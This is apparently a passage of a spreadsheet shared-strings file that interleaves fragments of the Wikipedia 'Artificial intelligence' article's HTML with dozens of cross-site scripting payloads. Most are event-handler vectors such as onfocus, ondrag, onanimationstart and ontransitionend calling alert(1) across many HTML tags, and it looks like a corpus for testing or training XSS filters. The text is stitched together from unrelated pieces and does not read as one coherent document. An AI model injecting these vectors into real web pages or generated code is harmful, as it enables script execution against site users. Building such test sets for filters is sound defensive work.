    <t xml:space="preserve">&lt;li id="cite_note-Matz_et_al_2017-340"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Matz_et_al_2017_340-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 onfocus=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/tfoot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;In video games, artificial intelligence is routinely used to generate dynamic purposeful behavior in &lt;a href="/wiki/Non-player_character" title="Non-player character"&gt;non-player characters &lt;/a&gt; (NPCs). In addition, well-understood AI techniques are routinely used for &lt;a href="/wiki/Pathfinding" title="Pathfinding"&gt;pathfinding &lt;/a&gt;. Some researchers consider NPC AI in games to be a "solved problem" for most production tasks. Games with more atypical AI include the AI director of &lt;i&gt;&lt;a href="/wiki/Left_4_Dead" title="Left 4 Dead"&gt;Left 4 Dead &lt;/a&gt; &lt;/i&gt; (2008) and the neuroevolutionary training of platoons in &lt;i&gt;&lt;a href="/wiki/Supreme_Commander_2" title="Supreme Commander 2"&gt;Supreme Commander 2 &lt;/a&gt; &lt;/i&gt; (2010).&lt;sup id="cite_ref-329" class="reference"&gt;&lt;a href="#cite_note-329"&gt;&amp;#91;318&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-330" class="reference"&gt;&lt;a href="#cite_note-330"&gt;&amp;#91;319&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;col onpointerdown=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerout=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Ignoramus_et_ignorabimus" title="Ignoramus et ignorabimus"&gt;Ignoramus et ignorabimus &lt;/a&gt; &lt;/i&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-wp1-344"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-wp1_344-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Analytic%E2%80%93synthetic_distinction" title="Analytic–synthetic distinction"&gt;Analytic–synthetic distinction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;canvas oncopy="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;sup oncut="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-9"&gt;&lt;a href="#Natural_language_processing"&gt;&lt;span class="tocnumber"&gt;4.5 </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rb ondragover=alert(1) contenteditable&gt;drop here&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;summary onmouseover="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;tr draggable="true" ondragleave="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>analytics.page();</t>
  </si>
  <si>
    <t>&lt;b onkeyup="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;iframe id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;span draggable="true" ondrag="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;link id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mobile_robot" title="Mobile robot"&gt;Mobile robot &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/John_N._Warfield" title="John N. Warfield"&gt;John N. Warfield &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=22" title="Edit section: Embodied intelligence"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;article onpointerout=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_as_evolution-412"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_as_evolution_412-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;input autofocus onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointerdown=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ol ondragover=alert(1) contenteditable&gt;drop here&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; on 25 March 2009&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;5 August </t>
  </si>
  <si>
    <t>&lt;multicol onpaste="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onpointermove=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_retrieval" title="Knowledge retrieval"&gt;Knowledge retrieval &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;" &lt;/a&gt;. &lt;i&gt;Business Insider &lt;/i&gt;. 25 May 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;6 May </t>
  </si>
  <si>
    <t>&lt;hr onblur=alert(1) tabindex=1 id=x&gt;&lt;/hr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;meta name="referrer" content="origin-when-cross-origin"/&gt;</t>
  </si>
  <si>
    <t>&lt;data onclick="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;em id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;q onmouseleave="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;progress oncut="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;mark id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerenter=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmouseleave="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;div ondrop=alert(1) contenteditable&gt;drop here&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointermove=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Currently, 50+ countries are researching battlefield robots, including the United States, China, Russia, and the United Kingdom. Many people concerned about risk from superintelligent AI also want to limit the use of artificial soldiers and drones.&lt;sup id="cite_ref-390" class="reference"&gt;&lt;a href="#cite_note-390"&gt;&amp;#91;379&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;frame id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;SPAN DATASRC="#" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;</t>
  </si>
  <si>
    <t>&lt;datalist draggable="true" ondrag="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;frame draggable="true" ondragstart="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In the early 1980s, AI research was revived by the commercial success of &lt;a href="/wiki/Expert_system" title="Expert system"&gt;expert systems &lt;/a&gt;,&lt;sup id="cite_ref-Expert_systems_41-0" class="reference"&gt;&lt;a href="#cite_note-Expert_systems-41"&gt;&amp;#91;41&amp;#93; &lt;/a&gt; &lt;/sup&gt; a form of AI program that simulated the knowledge and analytical skills of human experts. By 1985, the market for AI had reached over a billion dollars. At the same time, Japan's &lt;a href="/wiki/Fifth_generation_computer" title="Fifth generation computer"&gt;fifth generation computer &lt;/a&gt; project inspired the U.S and British governments to restore funding for &lt;a href="/wiki/Academic_research" class="mw-redirect" title="Academic research"&gt;academic research &lt;/a&gt;.&lt;sup id="cite_ref-AI_in_the_80s_10-2" class="reference"&gt;&lt;a href="#cite_note-AI_in_the_80s-10"&gt;&amp;#91;10&amp;#93; &lt;/a&gt; &lt;/sup&gt; However, beginning with the collapse of the &lt;a href="/wiki/Lisp_Machine" class="mw-redirect" title="Lisp Machine"&gt;Lisp Machine &lt;/a&gt; market in 1987, AI once again fell into disrepute, and a second, longer-lasting hiatus began.&lt;sup id="cite_ref-Second_AI_winter_12-1" class="reference"&gt;&lt;a href="#cite_note-Second_AI_winter-12"&gt;&amp;#91;12&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;audio onpaste="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;select onmouseover="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;header onmouseup="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Synergetics_(Haken)" title="Synergetics (Haken)"&gt;Synergetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style onbeforecut="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;tt ondblclick="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;audio onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/audio&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;code draggable="true" ondragleave="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerout=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onbeforecopy="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;object ondrop=alert(1) contenteditable&gt;drop here&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointermove=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;command onload=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;data style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;footer oncopy="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;sup draggable="true" ondragleave="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Moravec's paradox can be extended to many forms of social intelligence.</t>
  </si>
  <si>
    <t>AI as evolution:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ulla_Mitzdorf" title="Ulla Mitzdorf"&gt;Ulla Mitzdorf &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;basefont ondragover=alert(1) contenteditable&gt;drop here&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;element onblur=alert(1) tabindex=1 id=x&gt;&lt;/element&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpaste="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;object style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointerout=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onbeforecut="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;center id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmouseleave="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;caption ondragover=alert(1) contenteditable&gt;drop here&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FTCIAIG.2013.2286295"&gt;10.1109/TCIAIG.2013.2286295 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Computational+Intelligence+and+AI+in+Games&amp;amp;rft.atitle=A+Survey+of+Real-Time+Strategy+Game+AI+Research+and+Competition+in+StarCraft&amp;amp;rft.volume=5&amp;amp;rft.issue=4&amp;amp;rft.pages=293-311&amp;amp;rft.date=2013-12&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.406.2524&amp;amp;rft_id=info%3Adoi%2F10.1109%2FTCIAIG.2013.2286295&amp;amp;rft.aulast=Ontanon&amp;amp;rft.aufirst=Santiago&amp;amp;rft.au=Synnaeve%2C+Gabriel&amp;amp;rft.au=Uriarte%2C+Alberto&amp;amp;rft.au=Richoux%2C+Florian&amp;amp;rft.au=Churchill%2C+David&amp;amp;rft.au=Preuss%2C+Mike&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;datalist ondragover=alert(1) contenteditable&gt;drop here&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerover=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Existential_risk"&gt;Existential risk </t>
  </si>
  <si>
    <t>&lt;col onclick="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;audio ondblclick="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;output onmouseover="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpointerleave=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;colgroup id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/N._Katherine_Hayles" title="N. Katherine Hayles"&gt;N. Katherine Hayles &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;u onmouseup="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;AI Magazine &lt;/i&gt;. &lt;b&gt;1 &lt;/b&gt; (1). &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=AI+Magazine&amp;amp;rft.atitle=Artificial+Intelligence+Prepares+for+2001&amp;amp;rft.volume=1&amp;amp;rft.issue=1&amp;amp;rft.date=1983&amp;amp;rft.aulast=Nilsson&amp;amp;rft.aufirst=Nils&amp;amp;rft_id=https%3A%2F%2Fai.stanford.edu%2F~nilsson%2FOnlinePubs-Nils%2FGeneral%2520Essays%2FAIMag04-04-002.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;noembed oncopy="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerout=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;em onpointerenter=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Further information: &lt;a href="/wiki/Artificial_intelligence_arms_race" title="Artificial intelligence arms race"&gt;Artificial intelligence arms race &lt;/a&gt;, &lt;a href="/wiki/Lethal_autonomous_weapon" title="Lethal autonomous weapon"&gt;Lethal autonomous weapon &lt;/a&gt;, and &lt;a href="/wiki/Unmanned_combat_aerial_vehicle" title="Unmanned combat aerial vehicle"&gt;Unmanned combat aerial vehicle &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onstart=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-interaction"  aria-labelledby="p-interaction-label"&gt;</t>
  </si>
  <si>
    <t>&lt;del draggable="true" ondragstart="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;51, 64–65 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;th draggable="true" ondragend="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Theory_choice" title="Theory choice"&gt;Theory choice &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/section&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg draggable="true" ondragleave="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmousemove="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;414–416, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpaste="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;form onkeypress="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;meta oncopy="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFWasonShapiro1966" class="citation book"&gt;&lt;a href="/wiki/Peter_Cathcart_Wason" title="Peter Cathcart Wason"&gt;Wason, P. C. &lt;/a&gt;; Shapiro, D. (1966). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/newhorizonsinpsy0000foss"&gt;"Reasoning" &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;nav draggable="true" ondragstart="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Lieto, Antonio; Bhatt, Mehul; Oltramari, Alessandro; Vernon, David (May 2018). "The role of cognitive architectures in general artificial intelligence". &lt;i&gt;Cognitive Systems Research &lt;/i&gt;. &lt;b&gt;48 &lt;/b&gt;: 1–3. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.cogsys.2017.08.003"&gt;10.1016/j.cogsys.2017.08.003 &lt;/a&gt;. &lt;a href="/wiki/Handle_System" title="Handle System"&gt;hdl &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="//hdl.handle.net/2318%2F1665249"&gt;2318/1665249 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cognitive+Systems+Research&amp;amp;rft.atitle=The+role+of+cognitive+architectures+in+general+artificial+intelligence&amp;amp;rft.volume=48&amp;amp;rft.pages=1-3&amp;amp;rft.date=2018-05&amp;amp;rft_id=info%3Ahdl%2F2318%2F1665249&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.cogsys.2017.08.003&amp;amp;rft.aulast=Lieto&amp;amp;rft.aufirst=Antonio&amp;amp;rft.au=Bhatt%2C+Mehul&amp;amp;rft.au=Oltramari%2C+Alessandro&amp;amp;rft.au=Vernon%2C+David&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015188-223"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015188_223-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;menu style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 onfocus=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerenter=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/plaintext&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerleave=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;menu onbeforecut="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x controls onfocusin=alert(1) id=x&gt;&lt;source src="validaudio.wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;marquee id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;del oncut="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation conference"&gt;Bertini, M; Del Bimbo, A; Torniai, C (2006). "Automatic annotation and semantic retrieval of video sequences using multimedia ontologies". &lt;i&gt;MM '06 Proceedings of the 14th ACM international conference on Multimedia &lt;/i&gt;. 14th ACM international conference on Multimedia. Santa Barbara: ACM. pp.&amp;#160;679–682. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=conference&amp;amp;rft.atitle=Automatic+annotation+and+semantic+retrieval+of+video+sequences+using+multimedia+ontologies&amp;amp;rft.btitle=MM+%2706+Proceedings+of+the+14th+ACM+international+conference+on+Multimedia&amp;amp;rft.place=Santa+Barbara&amp;amp;rft.pages=679-682&amp;amp;rft.pub=ACM&amp;amp;rft.date=2006&amp;amp;rft.aulast=Bertini&amp;amp;rft.aufirst=M&amp;amp;rft.au=Del+Bimbo%2C+A&amp;amp;rft.au=Torniai%2C+C&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;In fiction &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onkeyup="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointerout=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dfn&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/State_space_search" title="State space search"&gt;State space search &lt;/a&gt; and &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;planning &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;kbd ondrop=alert(1) contenteditable&gt;drop here&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmouseenter="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 onfocus=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automated_retail" title="Automated retail"&gt;Retail &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink onpointermove=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmouseover="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerdown=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-SCHMID1992-265"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-SCHMID1992_265-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style draggable="true" ondragstart="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;sup oncopy="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmousedown="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;2–3 and 948 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmousedown="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Herbert Simon &lt;/a&gt; quote: &lt;a href="#CITEREFSimon1965"&gt;Simon 1965 &lt;/a&gt;, p.&amp;#160;96 quoted in &lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, p.&amp;#160;109. &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Natural language processing </t>
  </si>
  <si>
    <t>&lt;ins draggable="true" ondragenter="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointermove=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
